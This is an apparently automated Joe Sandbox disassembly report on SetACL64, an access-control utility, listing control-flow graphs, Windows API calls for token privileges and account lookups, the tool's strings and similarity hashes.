                                        control_flow_graph 3145 7ff68685f3c0-7ff68685f3e8 3146 7ff68685f3ea 3145->3146 3147 7ff68685f3ed-7ff68685f409 3145->3147 3146->3147 3148 7ff68685f40b 3147->3148 3149 7ff68685f40e-7ff68685f412 3147->3149 3148->3149 3150 7ff68685f419-7ff68685f41e 3149->3150 3151 7ff68685f414-7ff68685f417 3149->3151 3152 7ff68685f423-7ff68685f45c LookupAccountNameW GetLastError 3150->3152 3153 7ff68685f420 3150->3153 3151->3152 3154 7ff68685f469-7ff68685f487 3152->3154 3155 7ff68685f45e-7ff68685f464 GetLastError 3152->3155 3153->3152 3157 7ff68685f4e6-7ff68685f4fd call 7ff686835790 3154->3157 3158 7ff68685f489-7ff68685f490 3154->3158 3156 7ff68685f62f-7ff68685f646 3155->3156 3166 7ff68685f502-7ff68685f507 3157->3166 3167 7ff68685f4ff 3157->3167 3160 7ff68685f4bb-7ff68685f4c3 call 7ff6868621d4 3158->3160 3161 7ff68685f492-7ff68685f499 3158->3161 3173 7ff68685f4c6-7ff68685f4e1 call 7ff686864d90 3160->3173 3163 7ff68685f653-7ff68685f658 Concurrency::cancel_current_task 3161->3163 3164 7ff68685f49f-7ff68685f4a7 call 7ff6868621d4 3161->3164 3176 7ff68685f64d-7ff68685f652 call 7ff6868688fc 3164->3176 3177 7ff68685f4ad-7ff68685f4b9 3164->3177 3170 7ff68685f509-7ff68685f50c 3166->3170 3171 7ff68685f50e-7ff68685f513 3166->3171 3167->3166 3174 7ff68685f518-7ff68685f555 LookupAccountNameW 3170->3174 3171->3174 3175 7ff68685f515 3171->3175 3173->3157 3179 7ff68685f557-7ff68685f55f GetLastError 3174->3179 3180 7ff68685f561-7ff68685f568 3174->3180 3175->3174 3176->3163 3177->3173 3183 7ff68685f5bb-7ff68685f5be 3179->3183 3184 7ff68685f570-7ff68685f579 3180->3184 3186 7ff68685f5f9-7ff68685f5fc 3183->3186 3187 7ff68685f5c0-7ff68685f5d9 3183->3187 3184->3184 3188 7ff68685f57b-7ff68685f589 call 7ff686833f80 3184->3188 3192 7ff68685f62d 3186->3192 3193 7ff68685f5fe-7ff68685f608 3186->3193 3189 7ff68685f5db-7ff68685f5ee 3187->3189 3190 7ff68685f5f0-7ff68685f5f8 call 7ff6868621a0 3187->3190 3188->3183 3203 7ff68685f58b-7ff68685f58e 3188->3203 3189->3190 3194 7ff68685f647-7ff68685f64c call 7ff6868688fc 3189->3194 3190->3186 3192->3156 3197 7ff68685f60a-7ff68685f61d 3193->3197 3198 7ff68685f622-7ff68685f628 call 7ff6868621a0 3193->3198 3194->3176 3197->3176 3199 7ff68685f61f 3197->3199 3198->3192 3199->3198 3203->3183 3205 7ff68685f590-7ff68685f59b IsValidSid 3203->3205 3205->3183 3206 7ff68685f59d-7ff68685f5a4 3205->3206 3207 7ff68685f5a6-7ff68685f5ab call 7ff68686d6ac 3206->3207 3208 7ff68685f5af-7ff68685f5b7 call 7ff68685ec20 3206->3208 3207->3208 3208->3183
                                        APIs
                                        • LookupAccountNameW.ADVAPI32 ref: 00007FF68685F44D
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F453
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F45E
                                        • LookupAccountNameW.ADVAPI32 ref: 00007FF68685F54D
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F557
                                        • IsValidSid.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F593
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F647
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F64D
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68685F653
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorLast$AccountLookupName_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskValid
                                        • String ID:
                                        • API String ID: 311209037-0
                                        • Opcode ID: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
                                        • Instruction ID: 7838ea96591f6919d988251c95671d1217f67598a4a12cd07ed5671115db3171
                                        • Opcode Fuzzy Hash: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
                                        • Instruction Fuzzy Hash: B371B3A2A18B82C1EA249F11A54837D72A5FF84BD4F544339DA5E87794DF3DE840C760

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3213 7ff686843fd8-7ff686844008 AdjustTokenPrivileges 3214 7ff68684400a-7ff686844012 GetLastError 3213->3214 3215 7ff686844023-7ff686844036 GetLastError CloseHandle 3213->3215 3214->3215 3216 7ff686844014-7ff686844021 CloseHandle 3214->3216 3217 7ff686844037-7ff686844040 3215->3217 3216->3217 3218 7ff686844079-7ff686844095 3217->3218 3219 7ff686844042-7ff686844059 3217->3219 3222 7ff686844097-7ff6868440ae 3218->3222 3223 7ff6868440ce-7ff6868440d0 3218->3223 3220 7ff68684405b-7ff68684406e 3219->3220 3221 7ff686844074 call 7ff6868621a0 3219->3221 3220->3221 3224 7ff68684441f-7ff686844424 call 7ff6868688fc 3220->3224 3221->3218 3226 7ff6868440c9 call 7ff6868621a0 3222->3226 3227 7ff6868440b0-7ff6868440c3 3222->3227 3228 7ff6868441d8-7ff686844209 3223->3228 3229 7ff6868440d6-7ff68684415c call 7ff686833f80 * 2 call 7ff68683d260 3223->3229 3233 7ff686844425-7ff68684442a call 7ff6868688fc 3224->3233 3226->3223 3227->3226 3227->3233 3231 7ff686844268-7ff686844294 3228->3231 3232 7ff68684420b-7ff68684420e 3228->3232 3274 7ff686844196-7ff68684419f 3229->3274 3275 7ff68684415e-7ff686844175 3229->3275 3239 7ff686844296-7ff686844299 3231->3239 3240 7ff686844314-7ff686844320 3231->3240 3238 7ff686844210-7ff686844220 3232->3238 3250 7ff68684442b-7ff686844430 call 7ff6868688fc 3233->3250 3244 7ff686844239-7ff686844266 3238->3244 3245 7ff686844222-7ff686844233 call 7ff68685e4b0 3238->3245 3248 7ff6868442a0-7ff6868442b4 3239->3248 3246 7ff686844335-7ff686844341 3240->3246 3247 7ff686844322-7ff68684432c call 7ff68685e4b0 3240->3247 3244->3231 3244->3238 3245->3244 3268 7ff686844356-7ff68684435b 3245->3268 3253 7ff68684435d-7ff686844367 call 7ff686844810 3246->3253 3254 7ff686844343-7ff686844354 call 7ff68685e4b0 3246->3254 3260 7ff686844331-7ff686844333 3247->3260 3255 7ff6868442b6-7ff6868442c7 call 7ff68685e4b0 3248->3255 3256 7ff6868442cd-7ff6868442d2 3248->3256 3276 7ff686844369-7ff686844372 3253->3276 3277 7ff6868443b1-7ff6868443dc call 7ff686862180 3253->3277 3254->3253 3254->3268 3255->3256 3255->3268 3264 7ff6868442ea-7ff686844312 3256->3264 3265 7ff6868442d4-7ff6868442e8 call 7ff68685e4b0 3256->3265 3260->3246 3260->3268 3264->3240 3264->3248 3265->3264 3265->3268 3268->3277 3274->3228 3283 7ff6868441a1-7ff6868441b8 3274->3283 3278 7ff686844177-7ff68684418a 3275->3278 3279 7ff686844190-7ff686844195 call 7ff6868621a0 3275->3279 3280 7ff68684439e-7ff6868443a1 3276->3280 3281 7ff686844374-7ff686844396 call 7ff68684a350 3276->3281 3278->3250 3278->3279 3279->3274 3289 7ff6868443af 3280->3289 3290 7ff6868443a3-7ff6868443aa call 7ff68685b2b0 3280->3290 3281->3277 3296 7ff686844398 3281->3296 3287 7ff6868441ba-7ff6868441cd 3283->3287 3288 7ff6868441d3 call 7ff6868621a0 3283->3288 3287->3288 3294 7ff6868443dd-7ff68684441e call 7ff6868688fc * 11 3287->3294 3288->3228 3289->3277 3290->3289 3294->3224 3296->3280
                                        APIs
                                        Strings
                                        • Prepare, xrefs: 00007FF686844124
                                        • Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6868440F4
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CloseErrorHandleLast$AdjustPrivilegesToken
                                        • String ID: Prepare$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with
                                        • API String ID: 1992325626-2245062721
                                        • Opcode ID: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
                                        • Instruction ID: 17c5320fa135c33c8e6c1b2a4bae653178f06b8b82d40f068ecf13cb63e997f2
                                        • Opcode Fuzzy Hash: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
                                        • Instruction Fuzzy Hash: 8DA19FB2B18786C2EA24CB55E0483A96365FF84BE4F405139DA5D876E4DFBEE880C710

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3407 7ff686876c40-7ff686876c9c call 7ff686873e64 3410 7ff686876cb5-7ff686876cbc 3407->3410 3411 7ff686876c9e-7ff686876cb2 call 7ff686876ba4 3407->3411 3413 7ff686876d0b call 7ff68687648c 3410->3413 3414 7ff686876cbe-7ff686876cc5 3410->3414 3411->3410 3421 7ff686876d10-7ff686876d14 3413->3421 3416 7ff686876cc7-7ff686876ccc call 7ff686876534 3414->3416 3417 7ff686876cce call 7ff686876604 3414->3417 3422 7ff686876cd3-7ff686876cd7 3416->3422 3417->3422 3424 7ff686876e6d 3421->3424 3425 7ff686876d1a-7ff686876d25 3421->3425 3422->3425 3428 7ff686876cd9-7ff686876cef call 7ff686876ba4 3422->3428 3429 7ff686876e6f-7ff686876e8d 3424->3429 3426 7ff686876d27-7ff686876d2b 3425->3426 3427 7ff686876d35-7ff686876d38 call 7ff686876a74 3425->3427 3426->3427 3430 7ff686876d2d-7ff686876d33 GetACP 3426->3430 3433 7ff686876d3d-7ff686876d41 3427->3433 3428->3421 3436 7ff686876cf1-7ff686876cfb 3428->3436 3430->3433 3433->3424 3435 7ff686876d47-7ff686876d4c 3433->3435 3435->3424 3437 7ff686876d52-7ff686876d5d IsValidCodePage 3435->3437 3438 7ff686876cfd-7ff686876d02 call 7ff686876534 3436->3438 3439 7ff686876d04-7ff686876d09 call 7ff686876604 3436->3439 3437->3424 3440 7ff686876d63-7ff686876d66 3437->3440 3438->3421 3439->3421 3443 7ff686876d6b-7ff686876d6e 3440->3443 3444 7ff686876d68 3440->3444 3447 7ff686876e66-7ff686876e6b 3443->3447 3448 7ff686876d74-7ff686876d7f 3443->3448 3444->3443 3447->3429 3449 7ff686876d83-7ff686876d8b 3448->3449 3449->3449 3450 7ff686876d8d-7ff686876da2 call 7ff6868752dc 3449->3450 3453 7ff686876da8-7ff686876dbe call 7ff686877eb0 3450->3453 3454 7ff686876e8e-7ff686876f1b call 7ff68686892c call 7ff686873e64 * 2 call 7ff686877448 GetLocaleInfoW 3450->3454 3453->3424 3459 7ff686876dc4-7ff686876de3 call 7ff686877eb0 3453->3459 3471 7ff686876f1d-7ff686876f22 3454->3471 3472 7ff686876f24-7ff686876f37 call 7ff68687c558 3454->3472 3459->3424 3465 7ff686876de9-7ff686876df9 call 7ff6868831a0 3459->3465 3473 7ff686876e0b-7ff686876e22 call 7ff686877eb0 3465->3473 3474 7ff686876dfb-7ff686876e09 call 7ff6868831a0 3465->3474 3475 7ff686876f63-7ff686876f8b call 7ff686862180 3471->3475 3483 7ff686876f59-7ff686876f60 3472->3483 3484 7ff686876f39 3472->3484 3473->3424 3485 7ff686876e24-7ff686876e31 3473->3485 3474->3473 3474->3485 3483->3475 3487 7ff686876f40-7ff686876f43 3484->3487 3488 7ff686876e52-7ff686876e61 call 7ff68687da08 3485->3488 3489 7ff686876e33-7ff686876e4e call 7ff6868752dc 3485->3489 3487->3483 3492 7ff686876f45-7ff686876f4e 3487->3492 3488->3447 3489->3454 3495 7ff686876e50 3489->3495 3492->3487 3494 7ff686876f50-7ff686876f56 3492->3494 3494->3483 3495->3447
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorLastNameTranslate$CodePageValid
                                        • String ID: utf8
                                        • API String ID: 2136749100-905460609
                                        • Opcode ID: 06256d3170ea4477562b1b0a5136ccd5b8742c98d410ffa777cce2510612fae9
                                        • Instruction ID: 9c102d64d270edf609c833b25d11542124b4314424bb4e8ea6a0ac4bf71eceeb
                                        • Opcode Fuzzy Hash: 06256d3170ea4477562b1b0a5136ccd5b8742c98d410ffa777cce2510612fae9
                                        • Instruction Fuzzy Hash: C9919AB2B08746C6EB209F21D840AA927B4FF85B84F544039DA4D87796DF7EED91C720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Create$Event$Mutex
                                        • String ID:
                                        • API String ID: 646228171-0
                                        • Opcode ID: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
                                        • Instruction ID: 483f1282f2341bf1f79c2d7af73d9d32fde9014bd7fad07d434caa21cf24570a
                                        • Opcode Fuzzy Hash: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
                                        • Instruction Fuzzy Hash: 9A015EB1D28A52C2F314CB28BC5A7293691BF98311F505A3DD94DA59E0DF7F2440D721

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1530 7ff686843a20-7ff686843ac6 GetLastError 1532 7ff686843ac8-7ff686843adf 1530->1532 1533 7ff686843aff-7ff686843b1b 1530->1533 1536 7ff686843afa call 7ff6868621a0 1532->1536 1537 7ff686843ae1-7ff686843af4 1532->1537 1534 7ff686843b1d-7ff686843b34 1533->1534 1535 7ff686843b54-7ff686843b56 1533->1535 1538 7ff686843b36-7ff686843b49 1534->1538 1539 7ff686843b4f call 7ff6868621a0 1534->1539 1540 7ff686843b5c-7ff686843be2 call 7ff686833f80 * 2 call 7ff68683d260 1535->1540 1541 7ff686843c5e-7ff686843d83 call 7ff686833f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 1535->1541 1536->1533 1537->1536 1542 7ff6868443fb-7ff686844400 call 7ff6868688fc 1537->1542 1538->1539 1544 7ff686844401-7ff686844406 call 7ff6868688fc 1538->1544 1539->1535 1568 7ff686843c1c-7ff686843c25 1540->1568 1569 7ff686843be4-7ff686843bfb 1540->1569 1566 7ff686843dbc-7ff686843dd8 1541->1566 1567 7ff686843d85-7ff686843d9c 1541->1567 1542->1544 1556 7ff686844407-7ff68684440c call 7ff6868688fc 1544->1556 1565 7ff68684440d-7ff686844412 call 7ff6868688fc 1556->1565 1593 7ff686844413-7ff686844418 call 7ff6868688fc 1565->1593 1574 7ff686843dda-7ff686843df1 1566->1574 1575 7ff686843e11-7ff686843e13 1566->1575 1572 7ff686843db7 call 7ff6868621a0 1567->1572 1573 7ff686843d9e-7ff686843db1 1567->1573 1568->1541 1570 7ff686843c27-7ff686843c3e 1568->1570 1576 7ff686843c16-7ff686843c1b call 7ff6868621a0 1569->1576 1577 7ff686843bfd-7ff686843c10 1569->1577 1581 7ff686843c59 call 7ff6868621a0 1570->1581 1582 7ff686843c40-7ff686843c53 1570->1582 1572->1566 1573->1565 1573->1572 1585 7ff686843e0c call 7ff6868621a0 1574->1585 1586 7ff686843df3-7ff686843e06 1574->1586 1579 7ff686843e19-7ff686843e9f call 7ff686833f80 * 2 call 7ff68683d260 1575->1579 1580 7ff686843f1b-7ff686844040 call 7ff686833f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 1575->1580 1576->1568 1577->1556 1577->1576 1617 7ff686843ed9-7ff686843ee2 1579->1617 1618 7ff686843ea1-7ff686843eb8 1579->1618 1615 7ff686844079-7ff686844095 1580->1615 1616 7ff686844042-7ff686844059 1580->1616 1581->1541 1582->1581 1591 7ff6868443dd-7ff6868443fa call 7ff6868688fc * 5 1582->1591 1585->1575 1586->1585 1586->1593 1591->1542 1604 7ff686844419-7ff68684441e call 7ff6868688fc 1593->1604 1619 7ff68684441f-7ff686844424 call 7ff6868688fc 1604->1619 1623 7ff686844097-7ff6868440ae 1615->1623 1624 7ff6868440ce-7ff6868440d0 1615->1624 1621 7ff68684405b-7ff68684406e 1616->1621 1622 7ff686844074 call 7ff6868621a0 1616->1622 1617->1580 1628 7ff686843ee4-7ff686843efb 1617->1628 1625 7ff686843eba-7ff686843ecd 1618->1625 1626 7ff686843ed3-7ff686843ed8 call 7ff6868621a0 1618->1626 1640 7ff686844425-7ff68684442a call 7ff6868688fc 1619->1640 1621->1619 1621->1622 1622->1615 1633 7ff6868440c9 call 7ff6868621a0 1623->1633 1634 7ff6868440b0-7ff6868440c3 1623->1634 1636 7ff6868441d8-7ff686844209 1624->1636 1637 7ff6868440d6-7ff68684415c call 7ff686833f80 * 2 call 7ff68683d260 1624->1637 1625->1604 1625->1626 1626->1617 1629 7ff686843f16 call 7ff6868621a0 1628->1629 1630 7ff686843efd-7ff686843f10 1628->1630 1629->1580 1630->1591 1630->1629 1633->1624 1634->1633 1634->1640 1641 7ff686844268-7ff686844294 1636->1641 1642 7ff68684420b-7ff68684420e 1636->1642 1689 7ff686844196-7ff68684419f 1637->1689 1690 7ff68684415e-7ff686844175 1637->1690 1662 7ff68684442b-7ff686844430 call 7ff6868688fc 1640->1662 1651 7ff686844296-7ff686844299 1641->1651 1652 7ff686844314-7ff686844320 1641->1652 1649 7ff686844210-7ff686844220 1642->1649 1655 7ff686844239-7ff686844266 1649->1655 1656 7ff686844222-7ff686844233 call 7ff68685e4b0 1649->1656 1660 7ff6868442a0-7ff6868442b4 1651->1660 1657 7ff686844335-7ff686844341 1652->1657 1658 7ff686844322-7ff68684432c call 7ff68685e4b0 1652->1658 1655->1641 1655->1649 1656->1655 1682 7ff686844356-7ff68684435b 1656->1682 1665 7ff68684435d-7ff686844367 call 7ff686844810 1657->1665 1666 7ff686844343-7ff686844354 call 7ff68685e4b0 1657->1666 1673 7ff686844331-7ff686844333 1658->1673 1668 7ff6868442b6-7ff6868442c7 call 7ff68685e4b0 1660->1668 1669 7ff6868442cd-7ff6868442d2 1660->1669 1691 7ff686844369-7ff686844372 1665->1691 1692 7ff6868443b1-7ff6868443dc call 7ff686862180 1665->1692 1666->1665 1666->1682 1668->1669 1668->1682 1678 7ff6868442ea-7ff686844312 1669->1678 1679 7ff6868442d4-7ff6868442e8 call 7ff68685e4b0 1669->1679 1673->1657 1673->1682 1678->1652 1678->1660 1679->1678 1679->1682 1682->1692 1689->1636 1698 7ff6868441a1-7ff6868441b8 1689->1698 1693 7ff686844177-7ff68684418a 1690->1693 1694 7ff686844190-7ff686844195 call 7ff6868621a0 1690->1694 1695 7ff68684439e-7ff6868443a1 1691->1695 1696 7ff686844374-7ff686844396 call 7ff68684a350 1691->1696 1693->1662 1693->1694 1694->1689 1704 7ff6868443af 1695->1704 1705 7ff6868443a3-7ff6868443aa call 7ff68685b2b0 1695->1705 1696->1692 1710 7ff686844398 1696->1710 1702 7ff6868441ba-7ff6868441cd 1698->1702 1703 7ff6868441d3 call 7ff6868621a0 1698->1703 1702->1591 1702->1703 1703->1636 1704->1692 1705->1704 1710->1695
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastProcess$CurrentOpenToken
                                        • String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
                                        • API String ID: 6815931-1541018277
                                        • Opcode ID: e7fd04f08fec1a0ecb78bb51fd9c432250016c32d835b16c80ef034a2c114e38
                                        • Instruction ID: d3aeac8cba9e603a5d0f1641d2f012f4b63d9029f6ca9353756cfe1e6f409ec1
                                        • Opcode Fuzzy Hash: e7fd04f08fec1a0ecb78bb51fd9c432250016c32d835b16c80ef034a2c114e38
                                        • Instruction Fuzzy Hash: 0122B5F2A19782C2EE108B59E04836D6365FF857E4F405139E65D87AE9DFBEE880C710

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1711 7ff686842dcb-7ff686842dd3 1712 7ff686842dd9-7ff686842de1 1711->1712 1713 7ff68684346c-7ff68684347c call 7ff686864c18 1711->1713 1714 7ff686842de7-7ff686842deb 1712->1714 1715 7ff686843481-7ff686843495 call 7ff686864c18 1712->1715 1713->1715 1717 7ff686842ded-7ff686842dfd call 7ff686847b10 1714->1717 1718 7ff686842e03-7ff686842e0e 1714->1718 1721 7ff68684349a-7ff6868434aa call 7ff686864c18 1715->1721 1717->1718 1717->1721 1722 7ff686842e1a-7ff686842e32 1718->1722 1723 7ff686842e10-7ff686842e14 1718->1723 1735 7ff6868434af-7ff6868434c4 call 7ff686864c18 1721->1735 1724 7ff686842e4f-7ff686842e52 1722->1724 1725 7ff686842e34-7ff686842e4d call 7ff686829520 call 7ff6868496d0 1722->1725 1728 7ff686842e16-7ff686842e18 1723->1728 1729 7ff686842e90-7ff686842e9d 1723->1729 1733 7ff686842e6f-7ff686842e82 call 7ff686829520 call 7ff68684bc40 1724->1733 1734 7ff686842e54-7ff686842e66 call 7ff686829520 call 7ff68684b710 1724->1734 1764 7ff686842e84-7ff686842e8a 1725->1764 1728->1722 1728->1729 1731 7ff6868431e4 1729->1731 1732 7ff686842ea3-7ff686842ea5 1729->1732 1741 7ff6868431ea-7ff6868431ec 1731->1741 1732->1731 1737 7ff686842eab-7ff686842ef7 1732->1737 1733->1764 1767 7ff686842e6b-7ff686842e6d 1734->1767 1750 7ff6868434c5-7ff6868434da call 7ff686864c18 1735->1750 1745 7ff686842ef9-7ff686842f4f call 7ff6868541a0 call 7ff686855f60 1737->1745 1746 7ff686842f57-7ff686842f7a 1737->1746 1742 7ff68684331f-7ff6868433b7 call 7ff686833f80 * 2 call 7ff68683d260 1741->1742 1743 7ff6868431f2-7ff6868431f4 1741->1743 1823 7ff6868433b9-7ff6868433d3 1742->1823 1824 7ff6868433f4-7ff686843400 1742->1824 1743->1742 1751 7ff6868431fa-7ff686843207 1743->1751 1745->1746 1756 7ff686842f97-7ff686842fa9 1746->1756 1757 7ff686842f7c 1746->1757 1777 7ff6868434db-7ff6868434e0 call 7ff6868688fc 1750->1777 1762 7ff686843209-7ff68684320e call 7ff68687de6c 1751->1762 1763 7ff686843211-7ff68684323a call 7ff686829520 1751->1763 1759 7ff686842fb9-7ff686842fc0 1756->1759 1760 7ff686842fab-7ff686842fb2 1756->1760 1768 7ff686842f80-7ff686842f91 1757->1768 1770 7ff686842fd0-7ff686842fdf 1759->1770 1771 7ff686842fc2-7ff686842fc9 1759->1771 1760->1759 1762->1763 1789 7ff686843276-7ff686843278 1763->1789 1790 7ff68684323c-7ff686843256 1763->1790 1764->1729 1764->1735 1767->1764 1792 7ff686842f93 1768->1792 1778 7ff686842fe1-7ff686842ff1 1770->1778 1779 7ff686843054-7ff6868430f9 call 7ff686833f80 * 2 call 7ff68683d260 1770->1779 1771->1770 1806 7ff6868434e1-7ff6868434e6 call 7ff6868688fc 1777->1806 1786 7ff68684300e-7ff686843011 1778->1786 1787 7ff686842ff3-7ff68684300c call 7ff686829520 call 7ff6868496d0 1778->1787 1856 7ff686843136-7ff686843142 1779->1856 1857 7ff6868430fb-7ff686843115 1779->1857 1798 7ff68684302e-7ff686843041 call 7ff686829520 call 7ff68684bc40 1786->1798 1799 7ff686843013-7ff68684302c call 7ff686829520 call 7ff68684b710 1786->1799 1850 7ff686843043-7ff686843049 1787->1850 1801 7ff686843299-7ff6868432b1 1789->1801 1802 7ff68684327a-7ff686843289 call 7ff68685e1c0 1789->1802 1796 7ff686843258-7ff68684326b 1790->1796 1797 7ff686843271 call 7ff6868621a0 1790->1797 1792->1756 1796->1797 1809 7ff6868434e7-7ff6868434ec call 7ff6868688fc 1796->1809 1797->1789 1798->1850 1799->1850 1804 7ff6868432ce-7ff6868432d1 1801->1804 1805 7ff6868432b3-7ff6868432cc call 7ff686829520 call 7ff6868496d0 1801->1805 1802->1801 1826 7ff68684328b-7ff686843294 1802->1826 1817 7ff6868432ee-7ff686843301 call 7ff686829520 call 7ff68684e530 1804->1817 1818 7ff6868432d3-7ff6868432ec call 7ff686829520 call 7ff68684b710 1804->1818 1874 7ff686843303-7ff686843309 1805->1874 1806->1809 1841 7ff6868434ed-7ff686843502 call 7ff686864c18 1809->1841 1817->1874 1818->1874 1838 7ff6868433ee-7ff6868433f3 call 7ff6868621a0 1823->1838 1839 7ff6868433d5-7ff6868433e8 1823->1839 1828 7ff68684343d-7ff68684346b call 7ff686862180 1824->1828 1829 7ff686843402-7ff68684341c 1824->1829 1826->1841 1845 7ff686843437-7ff68684343c call 7ff6868621a0 1829->1845 1846 7ff68684341e-7ff686843431 1829->1846 1838->1824 1839->1838 1843 7ff686843503-7ff686843508 call 7ff6868688fc 1839->1843 1841->1843 1860 7ff686843509-7ff6868435d7 call 7ff6868688fc call 7ff686833f80 * 2 call 7ff68683d260 1843->1860 1845->1828 1846->1845 1846->1860 1850->1750 1854 7ff68684304f 1850->1854 1866 7ff68684317e-7ff6868431ae 1854->1866 1856->1866 1872 7ff686843144-7ff68684315e 1856->1872 1868 7ff686843117-7ff68684312a 1857->1868 1869 7ff686843130-7ff686843135 call 7ff6868621a0 1857->1869 1898 7ff6868435d9-7ff6868435f0 1860->1898 1899 